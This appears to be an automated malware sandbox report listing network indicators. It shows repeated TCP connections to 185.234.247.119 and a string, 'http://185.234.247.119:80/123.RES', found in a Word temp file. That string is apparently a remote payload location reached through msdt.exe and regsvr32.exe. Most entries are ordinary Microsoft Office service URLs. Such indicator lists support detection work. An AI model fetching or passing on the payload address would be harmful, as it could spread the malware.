                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: ~WRS{677538CC-22A1-43D9-BD9A-C629280F1C4E}.tmp.0.drString found in binary or memory: http://185.234.247.119:80/123.RES
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
                            Source: msdt.exe, 00000007.00000002.713967957.0000000005990000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
                            Source: regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                            Source: explorer.exe, 00000021.00000003.677304692.00000000050E4000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/Nhttp://www.borland.com/namespaces/Types
                            Source: explorer.exe, 00000021.00000003.677304692.00000000050E4000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                            Source: regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/http
                            Source: regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                            Source: regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/mime/
                            Source: regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap/
                            Source: explorer.exe, 00000021.00000003.677304692.00000000050E4000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap/#
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
                            Source: regsvr32.exe, 0000001C.00000002.672872094.0000000000867000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/Types
                            Source: regsvr32.exe, 00000026.00000002.713602734.0000000002F30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/Types-IWSDLPublish
                            Source: explorer.exe, 00000021.00000003.677304692.00000000050E4000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmpString found in binary or memory: http://www.borland.com/namespaces/TypesU
                            Source: explorer.exe, 00000021.00000003.677304692.00000000050E4000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmpString found in binary or memory: http://www.borland.com/namespaces/Typeshhttp://www.borland.com/namespaces/Types-IWSDLPublish
                            Source: regsvr32.exe, 0000001B.00000002.672627187.0000000002BD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/Typesp
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://addinslicensing.store.office.com/apps/remove
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.aadrm.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.aadrm.com/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.cortana.ai
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.diagnostics.office.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.microsoftstream.com/api/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.office.net
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.onedrive.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://apis.live.net/v5.0/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://augloop.office.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://augloop.office.com/v2
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://cdn.entity.
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://clients.config.office.net/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://config.edge.skype.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://cortana.ai
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://cortana.ai/api
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://cr.office.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://dataservice.o365filtering.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://dataservice.o365filtering.com/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://dev.cortana.ai
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://devnull.onenote.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://directory.services.
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://edu-mathreco-prod.trafficmanager.net
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://edu-mathsolver-prod.trafficmanager.net
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://enrichment.osi.office.net/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://graph.ppe.windows.net
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://graph.ppe.windows.net/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://graph.windows.net
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://graph.windows.net/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://incidents.diagnostics.office.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://inclient.store.office.com/gyro/client
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://invites.office.com/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://lifecycle.office.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://login.microsoftonline.com/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://login.windows.local
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://management.azure.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://management.azure.com/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://messaging.engagement.office.com/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://messaging.office.com/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://ncus.contentsync.
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://ncus.pagecontentsync.
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://officeapps.live.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://onedrive.live.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://onedrive.live.com/embed?
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://osi.office.net
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://otelrules.azureedge.net
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://outlook.office.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://outlook.office.com/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://outlook.office365.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://outlook.office365.com/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://pages.store.office.com/review/query
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://powerlift.acompli.net
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://roaming.edog.
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://settings.outlook.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://shell.suite.office.com:1443
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://skyapi.live.net/Activity/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://staging.cortana.ai
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://store.office.cn/addinstemplate
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://store.office.de/addinstemplate
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
